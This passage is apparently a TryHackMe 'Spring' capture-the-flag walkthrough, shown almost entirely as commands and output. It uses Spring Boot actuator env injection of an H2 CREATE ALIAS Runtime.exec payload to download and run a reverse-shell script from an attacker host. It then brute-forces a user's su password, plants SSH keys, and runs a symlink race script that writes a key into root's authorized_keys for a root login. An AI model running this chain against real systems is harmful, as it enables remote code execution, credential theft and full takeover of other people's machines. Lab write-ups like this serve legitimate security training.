> x-9ad42dea0356cb04: 172.16.0.21
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-Frame-Options: DENY
< Content-Type: application/vnd.spring-boot.actuator.v3+json
< Transfer-Encoding: chunked
< Date: Tue, 20 Oct 2020 10:00:27 GMT
<
* Connection #0 to host 10.10.6.25 left intact

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

{
  "_links": {
    "self": { "href": "https://10.10.6.25/actuator", "templated": false },
    "beans": {
      "href": "https://10.10.6.25/actuator/beans",
      "templated": false
    },
    "health": {
      "href": "https://10.10.6.25/actuator/health",
      "templated": false
    },
    "health-path": {
      "href": "https://10.10.6.25/actuator/health/{*path}",
      "templated": true
    },
    "shutdown": {
      "href": "https://10.10.6.25/actuator/shutdown",
      "templated": false
    },
    "env-toMatch": {
      "href": "https://10.10.6.25/actuator/env/{toMatch}",
      "templated": true
    },
    "env": { "href": "https://10.10.6.25/actuator/env", "templated": false },
    "mappings": {
      "href": "https://10.10.6.25/actuator/mappings",
      "templated": false
    },
    "restart": {
      "href": "https://10.10.6.25/actuator/restart",
      "templated": false
    }
  }
}

1

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\'java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'ping -c 5 10.8.106.222\');\"}' "https://10.10.6.25/actuator/env" -k

1
2
3

{
  "spring.datasource.hikari.connection-test-query": "CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new','java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('ping -c 5 10.8.106.222');"
}

1

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://10.10.6.25/actuator/restart" -k

1

{ "message": "Restarting" }

1

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'wget http://10.8.106.222/reverse.sh -O /tmp/reverse.sh\');\"}' "https://10.10.6.25/actuator/env" -k

1
2
3

{
  "spring.datasource.hikari.connection-test-query": "CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('wget http://10.8.106.222/reverse.sh -O /tmp/reverse.sh');"
}

1

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://10.10.6.25/actuator/restart" -k

1

{ "message": "Restarting" }

1

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'chmod +x /tmp/reverse.sh\');\"}' "https://10.10.6.25/actuator/env" -k

1
2
3

{
  "spring.datasource.hikari.connection-test-query": "CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('chmod +x /tmp/reverse.sh');"
}

1

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://10.10.6.25/actuator/restart" -k

1

{ "message": "Restarting" }

1

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'bash /tmp/reverse.sh\');\"}' "https://10.10.6.25/actuator/env" -k

1
2
3

{
  "spring.datasource.hikari.connection-test-query": "CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('bash /tmp/reverse.sh');"
}

1

curl -X 'POST' -H 'Content-Type: application/json' -H 'x-9ad42dea0356cb04: 172.16.0.21' "https://10.10.6.25/actuator/restart" -k

1

{ "message": "Restarting" }

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

kali@kali:~/CTFs/tryhackme/Spring$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.8.106.222] from (UNKNOWN) [10.10.6.25] 50702
bash: cannot set terminal process group (980): Inappropriate ioctl for device
bash: no job control in this shell
nobody@spring:/$ whoami
whoami
nobody
nobody@spring:/$ pwd
pwd
/
nobody@spring:/$ find / -name "foothold.txt" 2> /dev/null
find / -name "foothold.txt" 2> /dev/null
/opt/foothold.txt
nobody@spring:/$ cat /opt/foothold.txt
cat /opt/foothold.txt
THM{dont_expose_.git_to_internet}

1
2
3

kali@kali:~/CTFs/tryhackme/Spring$ cat /usr/share/wordlists/rockyou.txt | grep -E ^[A-Z][a-z]+$ > capitalized_words.txt
kali@kali:~/CTFs/tryhackme/Spring$ wc -l capitalized_words.txt
89652 capitalized_words.txt

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73

nobody@spring:/tmp$ wget 10.8.106.222/capitalized_words.txt
wget 10.8.106.222/capitalized_words.txt
--2020-10-20 10:32:18--  http://10.8.106.222/capitalized_words.txt
Connecting to 10.8.106.222:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 800052 (781K) [text/plain]
Saving to: ‘capitalized_words.txt’

     0K .......... .......... .......... .......... ..........  6%  705K 1s
    50K .......... .......... .......... .......... .......... 12% 1.43M 1s
   100K .......... .......... .......... .......... .......... 19% 1.45M 1s
   150K .......... .......... .......... .......... .......... 25% 1.51M 0s
   200K .......... .......... .......... .......... .......... 31% 3.30M 0s
   250K .......... .......... .......... .......... .......... 38% 1.45M 0s
   300K .......... .......... .......... .......... .......... 44% 1.45M 0s
   350K .......... .......... .......... .......... .......... 51% 1.44M 0s
   400K .......... .......... .......... .......... .......... 57% 1.44M 0s
   450K .......... .......... .......... .......... .......... 63% 1.47M 0s
   500K .......... .......... .......... .......... .......... 70% 1.46M 0s
   550K .......... .......... .......... .......... .......... 76% 1.43M 0s
   600K .......... .......... .......... .......... .......... 83% 1.49M 0s
   650K .......... .......... .......... .......... .......... 89% 1.49M 0s
   700K .......... .......... .......... .......... .......... 95% 1.46M 0s
   750K .......... .......... .......... .                    100% 2.99M=0.5s

2020-10-20 10:32:18 (1.44 MB/s) - ‘capitalized_words.txt’ saved [800052/800052]

nobody@spring:/tmp$ wget 10.8.106.222/su_brute_force.sh
wget 10.8.106.222/su_brute_force.sh
--2020-10-20 10:32:48--  http://10.8.106.222/su_brute_force.sh
Connecting to 10.8.106.222:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1486 (1.5K) [text/x-sh]
Saving to: ‘su_brute_force.sh’

     0K .                                                     100% 3.20M=0s

2020-10-20 10:32:48 (3.20 MB/s) - ‘su_brute_force.sh’ saved [1486/1486]

nobody@spring:/tmp$ ls -la
ls -la
total 872
drwxrwxrwt 20 root   root      4096 Oct 20 10:32 .
drwxr-xr-x 24 root   root      4096 Jul  3 06:24 ..
-rw-r--r--  1 nobody nogroup 800052 Oct 20 10:28 capitalized_words.txt
drwxrwxrwt  2 root   root      4096 Oct 20 09:56 .font-unix
drwxr-xr-x  2 nobody nogroup   4096 Oct 20 09:56 hsperfdata_nobody
drwxrwxrwt  2 root   root      4096 Oct 20 09:56 .ICE-unix
-rw-r--r--  1 nobody nogroup     52 Oct 20 09:52 reverse.sh
-rw-r--r--  1 nobody nogroup   1486 Oct 20 10:32 su_brute_force.sh
drwx------  3 root   root      4096 Oct 20 09:56 systemd-private-2297f9f63b0546f98d142121a9cb3fbe-systemd-resolved.service-IV1TyL
drwx------  3 root   root      4096 Oct 20 09:56 systemd-private-2297f9f63b0546f98d142121a9cb3fbe-systemd-timesyncd.service-VayZgn
drwxrwxrwt  2 root   root      4096 Oct 20 09:56 .Test-unix
drwxr-xr-x  3 nobody nogroup   4096 Oct 20 10:02 tomcat.1413271874927061952.443
drwxr-xr-x  3 nobody nogroup   4096 Oct 20 09:57 tomcat.4121958550386458699.443
drwxr-xr-x  3 nobody nogroup   4096 Oct 20 10:23 tomcat.5071741172342460092.443
drwxr-xr-x  3 nobody nogroup   4096 Oct 20 10:16 tomcat.6434282224217597898.443
drwxr-xr-x  3 nobody nogroup   4096 Oct 20 10:12 tomcat.7769403354826430658.443
drwxr-xr-x  2 nobody nogroup   4096 Oct 20 10:12 tomcat-docbase.2314163272531024622.443
drwxr-xr-x  2 nobody nogroup   4096 Oct 20 10:23 tomcat-docbase.3582439175683483452.443
drwxr-xr-x  2 nobody nogroup   4096 Oct 20 10:02 tomcat-docbase.3624752303650085691.443
drwxr-xr-x  2 nobody nogroup   4096 Oct 20 10:16 tomcat-docbase.4010369964569599950.443
drwxr-xr-x  2 nobody nogroup   4096 Oct 20 09:57 tomcat-docbase.4863931693030932923.443
drwxrwxrwt  2 root   root      4096 Oct 20 09:56 .X11-unix
drwxrwxrwt  2 root   root      4096 Oct 20 09:56 .XIM-unix
nobody@spring:/tmp$ chmod +x su_brute_force.sh
chmod +x su_brute_force.sh
nobody@spring:/tmp$ time bash su_brute_force.sh capitalized_words.txt
time bash su_brute_force.sh capitalized_words.txt
Creds Found! johnsmith:PrettyS3cureAccountPassword123.
Password:
uid=1000(johnsmith) gid=1000(johnsmith) groups=1000(johnsmith)
Cracking : [##--------------------------------------] 7

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

nobody@spring:/$ python3 -c "import pty; pty.spawn('/bin/bash')"
python3 -c "import pty; pty.spawn('/bin/bash')"
nobody@spring:/$ su - johnsmith
su - johnsmith
Password: PrettyS3cureAccountPassword123.

johnsmith@spring:~$ ls -la
ls -la
total 44
drwxr-xr-x 7 johnsmith johnsmith 4096 Jul 10 19:57 .
drwxr-xr-x 3 root      root      4096 Jun 28 19:28 ..
lrwxrwxrwx 1 johnsmith johnsmith    9 Jul 10 19:14 .bash_history -> /dev/null
-rw-r--r-- 1 johnsmith johnsmith  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 johnsmith johnsmith 3771 Apr  4  2018 .bashrc
drwx------ 2 johnsmith johnsmith 4096 Jul 10 19:43 .cache
drwx------ 3 johnsmith johnsmith 4096 Jun 28 19:29 .gnupg
drwxrwxr-x 3 johnsmith johnsmith 4096 Jul 10 19:43 .local
-rw-r--r-- 1 johnsmith johnsmith  807 Apr  4  2018 .profile
drwx------ 2 johnsmith johnsmith 4096 Jul 10 19:16 .ssh
drwxrwxr-x 2 johnsmith johnsmith 4096 Oct 20 10:35 tomcatlogs
-r-------- 1 johnsmith johnsmith   34 Jul 10 19:57 user.txt
johnsmith@spring:~$ cat user.txt
cat user.txt
THM{this_is_still_password_reuse}

1
2
3

johnsmith@spring:~$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDO7GTxIFv/SEVqelwR1OrCvcDRsaOYuyU3JtdaFxv1IPMxp8soS007K9eeQyZvpSiU7ynIhwJsSrfhPH9PWvpPF937Ppe8+LX5e5b+5FsFMoVw6dkwWW2fNImlDcXf273vD/7bTRB+SBo+UcBuIR31ERpM+90xCNKv+HERbiq1TznnBZXJ16Pxu2VBfSCLF4ZjPO4BFG62IQQmkK1e3v3CeiF2b8t+lbS2LrUCbLKdPYvhH6rzoz1LoPwvNOryTivgjDhs/xGFBY3RThAKBiLJXTOAx4qLf4FMEo0Cr8y6GBz3mtLj/UJzNctwllvj4NwVgDpoTqt1EsMA+d1BQYlO5XF4CmhGbKyQamvgrXzdAUKgE1sZ1oel84A3POCrOGJdngPRM9EkUWI9H6619SVmohjukRfWRbMQaUz1mxCz8SUDJlGZWs9kJgKec/LqgjyJxH6VV3ArOKMdoaRQ3BNwHMVmONWFZVOvj+QzXtSWd+ubAdO4HdNwv/ehUj86Qzs= kali@kali" > /home/johnsmith/.ssh/authorized_keys
<= kali@kali" > /home/johnsmith/.ssh/authorized_keys
johnsmith@spring:~$

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

kali@kali:~/CTFs/tryhackme/Spring$ ssh -i ~/.ssh/id_rsa johnsmith@10.10.6.25
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-109-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Oct 20 11:11:11 UTC 2020

  System load:  0.0                Processes:           101
  Usage of /:   11.7% of 58.80GB   Users logged in:     0
  Memory usage: 40%                IP address for eth0: 10.10.6.25
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

9 packages can be updated.
0 updates are security updates.


johnsmith@spring:~$ cat /etc/systemd/system/spring.service
[Unit]
Description=Spring Boot Application
After=syslog.target
StartLimitIntervalSec=0

[Service]
User=root
Restart=always
RestartSec=1
ExecStart=/root/start_tomcat.sh

[Install]
WantedBy=multi-user.target
johnsmith@spring:~$ systemctl status spring
● spring.service - Spring Boot Application
   Loaded: loaded (/etc/systemd/system/spring.service; enabled; vendor preset: enabled)
   Active: active (running) since Tue 2020-10-20 10:56:05 UTC; 18min ago
 Main PID: 841
    Tasks: 3 (limit: 1106)
   CGroup: /system.slice/spring.service
           ├─841 /bin/bash /root/start_tomcat.sh
           ├─852 sudo su nobody -s /bin/bash -c /usr/lib/jvm/java-8-openjdk-amd64/jre/bin/java -Djava.security.egd=file:///dev/urandom
           └─853 tee /home/johnsmith/tomcatlogs/1603191365.log

Warning: Journal has been rotated since unit was started. Log output is incomplete or unavailable.

johnsmith@spring:~$ cd tomcatlogs/
johnsmith@spring:~/tomcatlogs$ pwd
/home/johnsmith/tomcatlogs

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

target=$1

#send a shutdown request to the spring boot server
curl -X POST https://localhost/actuator/shutdown -H 'x-9ad42dea0356cb04: 172.16.0.21' -k

#get date as epoch format
d=$(date '+%s')

#let's assume 30 seconds is enough to restart the service
for i in {1..30}
do
 #create symlinks to target file for 30 seconds
 let time=$(( d + i ))
 ln -s $target "$time.log"
done

1
2
3
4
5

johnsmith@spring:~/tomcatlogs$ nano arbitrary_file_write.sh
johnsmith@spring:~/tomcatlogs$ bash arbitrary_file_write.sh /tmp/arbitrary_file_write.test
curl: (7) Failed to connect to localhost port 443: Connection refused
johnsmith@spring:~/tomcatlogs$ bash arbitrary_file_write.sh /tmp/arbitrary_file_write.test
{"message":"Shutting down, bye..."}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74

johnsmith@spring:~/tomcatlogs$ ls -la
total 268
drwxrwxr-x 2 johnsmith johnsmith   4096 Oct 20 11:21 .
drwxr-xr-x 7 johnsmith johnsmith   4096 Jul 10 19:57 ..
-rw-r--r-- 1 root      root        6928 Jul 10 19:42 1594410148.log
-rw-r--r-- 1 root      root        6728 Jul 10 19:47 1594410465.log
-rw-r--r-- 1 root      root        5237 Jul 10 20:38 1594413491.log
-rw-r--r-- 1 root      root        7194 Jul 12 11:13 1594552377.log
-rw-r--r-- 1 root      root        6990 Jul 12 17:26 1594574751.log
-rw-r--r-- 1 root      root        7429 Jul 12 17:36 1594575333.log
-rw-r--r-- 1 root      root        7182 Jul 12 17:47 1594576008.log
-rw-r--r-- 1 root      root        6725 Jul 12 20:07 1594584453.log
-rw-r--r-- 1 root      root      193976 Oct 20 11:21 1603191365.log
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192819.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192820.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192821.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192822.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192823.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192824.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192825.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192826.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192827.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192828.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192829.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192830.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192831.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192832.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192833.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192834.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192835.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192836.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192837.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192838.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192839.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192840.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192841.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192842.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192843.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192844.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192845.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192846.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192847.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:20 1603192848.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192864.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192865.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192866.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192867.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192868.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192869.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192870.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192871.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192872.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192873.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192874.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192875.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192876.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192877.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192878.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192879.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192880.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192881.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192882.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192883.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192884.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192885.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192886.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192887.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192888.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192889.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192890.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192891.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192892.log -> /tmp/arbitrary_file_write.test
lrwxrwxrwx 1 johnsmith johnsmith     30 Oct 20 11:21 1603192893.log -> /tmp/arbitrary_file_write.test
-rw-rw-r-- 1 johnsmith johnsmith    376 Oct 20 11:20 arbitrary_file_write.sh

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

#!/bin/bash

#generate ssh key if it does not exists
[ -f ./key ] && true || ssh-keygen -b 2048 -t ed25519 -f ./key -q -N ""
#read public key
pubkey=$(cat ./key.pub)

#send a shutdown request to the spring boot server
curl -X POST https://localhost/actuator/shutdown -H 'x-9ad42dea0356cb04: 172.16.0.21' -k

#get date as epoch format
d=$(date '+%s')

#let's assume 30 seconds is enough to restart the service
for i in {1..30}
do
 #create symlinks to /root/.ssh/authorized_keys for 30 seconds
 let time=$(( d + i ))
 ln -s /root/.ssh/authorized_keys "$time.log"
done

#wait for app to restart
sleep 30s

#send publickey as name to the greating server
curl --data-urlencode "name=$pubkey" https://localhost/ -k
sleep 5s

#connect as root
ssh  -o "StrictHostKeyChecking=no" -i ./key root@localhost

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

johnsmith@spring:~/tomcatlogs$ nano get_root.sh
johnsmith@spring:~/tomcatlogs$ bash get_root.sh
{"message":"Shutting down, bye..."}
whoami
Hello, ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILKTKMqNsInLM2tkn0LUwUH1ejRM1tm39w7FT9joN17E johnsmith@spring!Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.

whoami
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-109-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Oct 20 11:24:59 UTC 2020

  System load:  0.62               Processes:           101
  Usage of /:   11.7% of 58.80GB   Users logged in:     1
  Memory usage: 35%                IP address for eth0: 10.10.6.25
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

9 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


root@spring:~# ls
root.txt  start_tomcat.sh
root@spring:~# cat root.txt
THM{sshd_does_not_mind_the_junk}
root@spring:~#